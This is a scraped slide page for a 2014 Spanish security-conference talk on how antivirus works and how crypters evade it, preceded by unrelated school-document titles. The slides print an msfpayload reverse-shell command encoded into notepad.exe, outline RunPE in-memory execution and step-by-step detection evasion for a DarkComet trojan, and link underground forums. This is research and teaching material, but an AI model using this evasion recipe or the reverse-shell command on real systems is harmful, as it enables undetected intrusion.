ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
DanielErazoMedina
 
proyecto invernadero desde el departamento de tecnología para Erasmus
proyecto invernadero desde el departamento de tecnología para Erasmusproyecto invernadero desde el departamento de tecnología para Erasmus
proyecto invernadero desde el departamento de tecnología para Erasmus
raquelariza02
 
trabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6ftrabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6f
zoecaicedosalazar
 
Conceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. TecnologíaConceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. Tecnología
coloradxmaria
 
Conceptos básicos de programación 10-5.pdf
Conceptos básicos de programación 10-5.pdfConceptos básicos de programación 10-5.pdf
Conceptos básicos de programación 10-5.pdf
ValeriaAyala48
 
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdfEstructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
IsabellaRubio6
 
Posnarrativas en la era de la IA generativa
Posnarrativas en la era de la IA generativaPosnarrativas en la era de la IA generativa
Posnarrativas en la era de la IA generativa
Fernando Villares
 

Último (20)

(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
 
Ventajas y desventajas de la desinfección con cloro
Ventajas y desventajas de la desinfección con cloroVentajas y desventajas de la desinfección con cloro
Ventajas y desventajas de la desinfección con cloro
 
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...
 
Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.
 
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
 
Inteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdfInteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdf
 
Diagrama de flujo basada en la reparacion de automoviles.pdf
Diagrama de flujo basada en la reparacion de automoviles.pdfDiagrama de flujo basada en la reparacion de automoviles.pdf
Diagrama de flujo basada en la reparacion de automoviles.pdf
 
3Redu: Responsabilidad, Resiliencia y Respeto
3Redu: Responsabilidad, Resiliencia y Respeto3Redu: Responsabilidad, Resiliencia y Respeto
3Redu: Responsabilidad, Resiliencia y Respeto
 
Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5
 
leidy fuentes - power point -expocccion -unidad 4 (1).pptx
leidy fuentes - power point -expocccion -unidad 4 (1).pptxleidy fuentes - power point -expocccion -unidad 4 (1).pptx
leidy fuentes - power point -expocccion -unidad 4 (1).pptx
 
Estructuras básicas_ conceptos básicos de programación.pdf
Estructuras básicas_  conceptos básicos de programación.pdfEstructuras básicas_  conceptos básicos de programación.pdf
Estructuras básicas_ conceptos básicos de programación.pdf
 
MANUAL DEL DECODIFICADOR DVB S2. PARA VSAT
MANUAL DEL DECODIFICADOR DVB  S2. PARA VSATMANUAL DEL DECODIFICADOR DVB  S2. PARA VSAT
MANUAL DEL DECODIFICADOR DVB S2. PARA VSAT
 
Estructuras Básicas_Tecnología_Grado10-7.pdf
Estructuras Básicas_Tecnología_Grado10-7.pdfEstructuras Básicas_Tecnología_Grado10-7.pdf
Estructuras Básicas_Tecnología_Grado10-7.pdf
 
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
 
proyecto invernadero desde el departamento de tecnología para Erasmus
proyecto invernadero desde el departamento de tecnología para Erasmusproyecto invernadero desde el departamento de tecnología para Erasmus
proyecto invernadero desde el departamento de tecnología para Erasmus
 
trabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6ftrabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6f
 
Conceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. TecnologíaConceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. Tecnología
 
Conceptos básicos de programación 10-5.pdf
Conceptos básicos de programación 10-5.pdfConceptos básicos de programación 10-5.pdf
Conceptos básicos de programación 10-5.pdf
 
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdfEstructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
 
Posnarrativas en la era de la IA generativa
Posnarrativas en la era de la IA generativaPosnarrativas en la era de la IA generativa
Posnarrativas en la era de la IA generativa
 

NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus

  • 1. Desmitificando el AntiVirus Desmitificando el AntiVirus #NcN2k14 Abraham Pasamar (@apasamar)
  • 2. Whoami Sobre mi: Abraham Pasamar @apasamar CEO Inci e apasamar@incide.es www.incide.es PGP key ID: 0x3ee5fcf7693108b4 d +10 años seguridad Computer Forensics Incident Response Expert Witness Pentesting PASSWORD: 1234567 #NcN2k14 Abraham Pasamar (@apasamar)
  • 3. Efectividad de los Antivirus Evasión de Antivirus Crypters C Crypter DEMO #NcN2k14 Abraham Pasamar (@apasamar)
  • 4. Agradecimientos #NcN2k14 Abraham Pasamar (@apasamar) Jose Selvi Abel Gómez camisetasfrikis.es Vrillon/Venon Creative Commons
  • 5. Antivirus #NcN2k14 Abraham Pasamar (@apasamar)
  • 6. Antivirus #NcN2k14 Abraham Pasamar (@apasamar) ¿Nos protegen? Sí ¿Hasta qué punto? Todo lo que pueden respecto de las ‘infecciones’ comunes y lo que pueden ‘prever’
  • 7. Ataque dirigido (APT) Cybercriminales ¿Nos protegen? No mucho Las técnicas de ‘Detección’ de los AVs actualmente son insuficientes Las defensas convencionales son insuficientes #NcN2k14 Abraham Pasamar (@apasamar)
  • 8. Ataque dirigido (APT) Cybercriminales ¿Nos protegen? No mucho Las técnicas de ‘Detección’ de los AVs actualmente son insuficientes Las defensas convencionales son insuficientes #NcN2k14 Abraham Pasamar (@apasamar)
  • 9. Press #NcN2k14 Abraham Pasamar (@apasamar) Brian Dye, CEO de Symantec mayo 2014 Paradigma ha cambiado —> protección AV host/perimetro es insuficiente
  • 10. AV: ¿Cómo funcionan? Escanean binarios en el DISCO ¿Escanean en MEMORIA? algunos y poco :( Buscan FIRMAS @ AV BBDD Buscan TÉCNICAS MALICIOSAS (heurística) EMULADOR (ejecución parcial) Tiempo Real #NcN2k14 Abraham Pasamar (@apasamar)
  • 11. ¿Por qué evadir AV’s? BAD GUYS: MALWARE = $$$$$$$ Botnets, Ransomware, … GOOD GUYS: #NcN2k14 Abraham Pasamar (@apasamar) APT Auditoría, Pentesting
  • 12. ¿Cómo evadir AV’s? Encoders Packers Crypters msfpayload windows/shell/ reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe #NcN2k14 Abraham Pasamar (@apasamar)
  • 13. ¿Cómo evadir AV’s? Encoders MALWARE suele ser una pieza compleja. Packers Crypter es mucho más simple. Permite proteger malware detectado. Crypters msfpayload windows/shell/ reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe REUTILIZACIÓN TIP: Método Público = MAL Método Privado = BIEN #NcN2k14 Abraham Pasamar (@apasamar)
  • 14. ¿Información sobre Crypters? Papers “Abusing File Processing in Malware Detectors for Fun and Profit” (2012) Suman Jana and Vitaly Shmatikov The University of Texas at Austin “Bypassing Anti-Virus Scanners” (2012) InterNOT Security Team #NcN2k14 Abraham Pasamar (@apasamar) “Hyperion: Implementation of a PE-Crypter”(2012) Christian Ammann http://www.nullsecurity.net/ “One packer to rule them all: Empirical identification, comparison and circumvention of current Antivirus detection techniques”(BruCON 2014) Arne Swinnen,Alaeddine Mesbahi
  • 15. Foros Underground #NcN2k14 Abraham Pasamar (@apasamar) Manuales Video-Tutoriales Binarios Código Herramientas Multi AV-Scanners Enlaces: http://www.indetectables.net http://www.udtools.net http://www.masters-hackers.info http://www.level-23.biz http://www.corp-51.net http://www.underc0de.org
  • 16. ¿Qué es un Crypter? Software creado para ocultar código malicioso y hacerlo indetectable a los antivirus (FUD) STUB MALWARE DETECTADO XOR, RC4, ... MALWARE CIFRADO #NcN2k14 Abraham Pasamar (@apasamar) CRYPTER (Builder) STUB CRYPTER + STUB exe dll recurso
  • 17. Builder / Stub B u i l de r: S e e n c a rg a de c om p o n e r e l n ue v o e je c u t a b l e . B u i l de r (M a l wa re De te c t a d o) = St u b + M a l wa re C i f r a d o St u b: S e e n c a r g a de : * De s c i f r a r e l M a l wa re C i f r a d o * Ej e c u t a r l o d i re c t ame n t e e n me m o r i a s i n q ue e l M a l wa re t o q u e e l d i s c o P i e z a más i m p o r t a n t e S e e n f re n t a a l o s AV’s #NcN2k14 Abraham Pasamar (@apasamar)
  • 18. RunPE o Dynamic Forking CreateProcess EP 2 ReadFile WriteProcessMemory #NcN2k14 Abraham Pasamar (@apasamar) PROCESO 1 (CREATE_SUSPENDED) GetThreadContext EP I PEB EBX EAX 1 +8 PROCESO 2 BaseAddress 2 ResumeThread SetThreadContext
  • 19. Let’s code a C Crypter #NcN2k14 Abraham Pasamar (@apasamar) Builder MALWARE STUB MALWARE CIFRADO C O N T E N E D O R
  • 20. Let’s code a C Crypter RUTINA DE CIFRADO #NcN2k14 Abraham Pasamar (@apasamar) Builder
  • 21. Let’s code a C Crypter STUB+FIRMA+MALWARE CIFRADO #NcN2k14 Abraham Pasamar (@apasamar) Builder
  • 22. Let’s code a C Crypter Descifrado (decryptbuffer=XOR[buffer]) #NcN2k14 Abraham Pasamar (@apasamar) Stub Localizar la FIRMA SEPARADORA
  • 23. Let’s code a C Crypter Arrancar el proceso en memoria (Dynamic Forking) CreateProcess (CREATE_SUSPEND) #NcN2k14 Abraham Pasamar (@apasamar) Stub Estructuras cabecera ejecutable WriteProcessMemory ResumeThread
  • 24. Let’s SCAN the Crypter Multi AV SCAN #NcN2k14 Abraham Pasamar (@apasamar) TROJAN SERVER (Darkcomet). SIN CRYPTER TROJAN SERVER CRYPTED (stub+[crypted Darkcomet])
  • 25. Improving the Crypter :( 13 Signatures … ¿ Qué podemos hacer ? API HOOKS :) GetProcAddress #NcN2k14 Abraham Pasamar (@apasamar)
  • 26. Let’s SCAN the Crypter Multi AV SCAN V1 - Original Crypter V2 - API Hooks #NcN2k14 Abraham Pasamar (@apasamar)
  • 27. Improving the Crypter Añadiendo soporte para parámetros main —> WinMain (nCmdLine) #NcN2k14 Abraham Pasamar (@apasamar)
  • 28. Improving the Crypter Cambiando la rutina de cifrado XOR —> byte SWAP #NcN2k14 Abraham Pasamar (@apasamar)
  • 29. Let’s SCAN the Crypter Multi AV SCAN V2 - API Hooks V3 - Parameters & byte Swap Ooohhh!!! #NcN2k14 Abraham Pasamar (@apasamar)
  • 30. Improving the Crypter FIRMAS indican HEURISTICA ¡¡¡ Matemos las firmas heurísticas !!! Exhausting routine Emulador —> Time Out ANTIVIRUS SANDBOX REAL TIME DETECTION No es posible procesarlo en tiempo real #NcN2k14 Abraham Pasamar (@apasamar)
  • 31. Let’s SCAN the Crypter Multi AV SCAN V4 - Exhausting Routine V3 - Parameters & byte Swap OH YEAH !!! #NcN2k14 Abraham Pasamar (@apasamar)
  • 32. Improving the Crypter FIRMAS Estáticas AVAST Método de cifrado Variante: SWAP +/- 1 #NcN2k14 Abraham Pasamar (@apasamar)
  • 33. Improving the Crypter FIRMAS Estáticas AVIRA Firmas Cabecera (CRC/clusterización) - FLAGS Sección CAMBIAMOS FLAGs VALOR NO ESPERADO #NcN2k14 Abraham Pasamar (@apasamar)
  • 34. Let’s SCAN the Crypter Multi AV SCAN V4 - Exhausting Routine V6 - Cifrado+ & patch Flags Awesome!!! #NcN2k14 Abraham Pasamar (@apasamar)
  • 35. DEMO Crypter en C (FUD) Probarlo en un ataque Ingeniería social (1 click) Word + Macro (downloader) Sandworm (0 clicks) Ejecución FUD-Trojan en TR #NcN2k14 Abraham Pasamar (@apasamar)
  • 36. Conclusiones Bypass AVs es POSIBLE —-> Compromiso INFORMACIÓN Necesario prestar atención al COMPORTAMIENTO Algunos elementos a considerar: Perímetro (callbacks C&C) SANDBOX Contexto #NcN2k14 Abraham Pasamar (@apasamar)
  • 37. Imágenes Banco Imáges Propio http://www.gratisography.com/ http://broadbandandsocialjustice.org/ Flickr, user: eviltomthai Chiswick Chap - Own work #NcN2k14 Abraham Pasamar (@apasamar)
  • 38. Gracias apasamar INCIDE Avda. Diagonal, 640 6ª Planta 08017 Barcelona info@incide.es http://www.incide.es 1NC1D3 http://www.incide.es/blog-incide/ http://www.youtube.com/incidetube Companies > INCIDE - Investigación Digital Tel./Fax. +34 932 546 277 / +34 932 546 314 #NcN2k14 Abraham Pasamar (@apasamar)